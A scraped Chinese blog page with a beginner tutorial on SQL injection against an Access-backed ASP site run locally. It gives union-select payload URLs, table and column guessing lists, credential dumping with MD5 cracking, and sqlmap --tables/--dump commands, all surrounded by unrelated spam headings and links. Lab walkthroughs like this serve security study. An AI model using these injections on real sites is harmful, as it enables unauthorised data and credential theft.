当前位置: 首页 > news >正文

韩韩良品只做性价比网站下载/seo排名赚app靠谱吗

韩韩良品只做性价比网站下载,seo排名赚app靠谱吗,济南做网站的好公司有哪些,动态网站建设 教学大纲access数据库简单介绍先来介绍一下这个数据库,Microsoft Office Access,Microsoft Office Access是由微软发布的关系数据库管理系统。它结合了 MicrosoftJet Database Engine 和 图形用户界面两项特点,是 Microsoft Office 的系统程序之一。优…

7b0c5696594d166f9669225d65efbba4.gif

5e848342578877f795ea35a0a747dde6.png

access数据库简单介绍

先来介绍一下这个数据库,Microsoft Office Access,Microsoft Office Access是由微软发布的关系数据库管理系统。它结合了 MicrosoftJet Database Engine 和 图形用户界面两项特点,是 Microsoft Office 的系统程序之一。

优势:提高速度和减少代码量

缺点:当数据库过大时,一般达到100M左右性能就会开始慢慢下降了(比如访问人数过多,过度消耗服务器资源),安全性能差。

适合人群:小白,初学者了解sql注入,编程人员 (大佬勿喷)

首先是sql注入产生的条件:

1.参数的传递

2.参数值可以带入到数据库

我们这里本地搭建了一个漏洞平台(漏洞源码会附在下面链接的)

bcd922b6627fbd259ba3d760071a9d9e.png

第一步 找注入点

我这注入点是 http://localhost:58031/Production/PRODUCT_DETAIL.asp?id=1139

先用 ' 单引号报错 如果报错了说明有注入点的可能性

再用

and 1=1 返回正常

and 1=2 返回不正常

返回正常 http://localhost:58031/Production/PRODUCT_DETAIL.asp?id=1139 and 1=1

返回不正常 http://localhost:58031/Production/PRODUCT_DETAIL.asp?id=1139 and 1=2

第二步 我们再来判断一下它的数据类型

and (select count(*) from sysobjects)>0  判断sql server

and (select count(*) from msysobjects)>0 判断access数据库 返回不够权限就是access数据库了

b4a0d5a5a5b28ce763223bdc37565ea4.png

我这里判断的是 access数据库

第三步 用order by 判断字段数量

http://localhost:58031/Production/PRODUCT_DETAIL.asp?id=1139 order by 30

我们这里使用折中猜解法,这里30返回报错,那我们继续下去

136ce7461202b86e76710b0285b056b0.png

这里猜的是22个字段数量

那我们接着继续下去

第四步 联合查询

两条语句

union select 长度 from 表

union select 列名 from  表   

首先我们长度是22

那我们构成语句

http://localhost:58031/Production/PRODUCT_DETAIL.asp?id=1139 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from 表名

这里表名我们就慢慢自己构造 直到出数据所在字段了

常用的表名

admin、a_admin、x_admin、m_admin、adminuser、adminstrator...

我这里猜测的表名是 admin 爆出来了

58caf0d573bf51618b45ee697c6ec189.png

这里出来的两个字段 3,15 我们继续猜测列名

常用的列名

admin,password,username、admin_name、name、admin_userid、admin_id

我们就猜最常见的吧

http://localhost:58031/Production/PRODUCT_DETAIL.asp?id=1139 union select 1,2,admin,4,5,6,7,8,9,10,11,12,13,14,password,16,17,18,19,20,21,22 from admin

admin放3字段位置上,password放在15字段位置上

501ae3e093f85086b12a5f475542914f.png

ok账号密码都出来了

admin  a48e190fafc257d3

密码是MD5加密了  我们拿到解密网站解密一下

aa607364a9defbfba8be9ddc9b4a1bd5.png

最后解开的密码就是bendss

所以账号是 admin  密码是 bendss

sqlmap(access数据库注入)工具篇

 先用 sqlmap.py -u "URL"  看看是否能注入

sqlmap.py -u "http://localhost:58031/Production/PRODUCT_DETAIL.asp?id=1139"

8d6605b913c33fea293538dc614e34fd.png

ok,这里返回了 DBMS 'microsoft access'   也就是 access 数据库,也没报红,说明可以注入

我们先来猜猜它的数据库表名吧

语句

sqlmap.py -u "url" --tables

sqlmap.py -u "http://localhost:58031/Production/PRODUCT_DETAIL.asp?id=1139" --tables

7df06535b49cfcac4bb59c9bb55d8eef.png

ok,这里表名有 admin  admin_login email guestbook job news product

我们再来猜解下admin表里的字段

1f75e732a31df3c2f2262758b6f127eb.png

我们这里 需要的字段 就admin 跟 password

继续往下猜解这两个字段里的数据

语句

sqlmap.py -u "url" --dump -T 表名 -C "字段名"

sqlmap.py -u "http://localhost:58031/Production/PRODUCT_DETAIL.asp?id=1139" --dump -T admin -C "admin,password"

eec9111b7c2022dce80e10385b515c48.png

数据也出来了 ok上面 解密过了 就不再解了

慢慢了解sql注入, 从最简单的数据库开始

*本文原创作者:辰小白   转载请注明来源于华盟网源及作者

ae7f9b2c7cbf8bc783a6a7bbe00c25ac.png12514b39f17e588e0db7b6f3be04c537.png

http://www.lbrq.cn/news/1591903.html

相关文章:

  • 独立网站上后台怎么管理图片/廊坊百度关键词优化怎么做
  • 做平面什么网站好用/爱站网关键词搜索
  • 视频网站应该怎么做/广州seo推广公司
  • 阿里巴巴网站如何做免费推广/搜索引擎付费推广
  • 网站商城建设哪家好/专业网站制作网站公司
  • 做网站个体户执照/厦门seo屈兴东
  • 济源网站制作/关键词查找工具
  • 网站友情链接如何做/网站广告策划
  • 网站制作多少钱资讯/seo整站优化哪家好
  • 学校资源门户网站建设方案/南京网络营销服务
  • 东莞社保官方网站/岳阳seo公司
  • 做网站起诉/网销怎么找客户资源
  • 网站建设小程序湖南/十大接单平台
  • 建设银网站/站长工具使用方法
  • 做网站主机要求/网站底部友情链接代码
  • 沧州网络公司科技/seowhy官网
  • 北京电商购物网站开发/郑州网站开发公司
  • 深圳H5网站开发/百度竞价推广关键词优化
  • 南宁做棋牌网站的公司/软文写作技巧
  • 苹果做ppt模板下载网站有哪些/正规网络推广服务
  • 网站页面怎么做的好看/seo课程培训班费用
  • 网站怎么做短信营销/网络营销系统
  • 成都网站建设zmcms/seo网站快排
  • 网站右键禁止/谷歌推广怎么做
  • 南昌网站建设模板下载网址/抖音企业推广
  • 网站建设外包价格/百度手机快速排名点击软件
  • 广州做网站 timhi/网络营销平台的主要功能
  • 上传到网站/苏州企业网站关键词优化
  • 建设路第3小学网站电话/贴吧推广400一个月
  • 怎么创建公司网站空间/运用搜索引擎营销的案例
  • 19day-人工智能-机器学习-分类算法-决策树
  • Docker 常用命令介绍
  • Tesseract + Poppler 实现图片型 PDF 转文字
  • Spring Boot全局异常处理与日志监控实战指南
  • 《汇编语言:基于X86处理器》第11章 MS-Windows编程(3)
  • 业务系统跳转Nacos免登录方案实践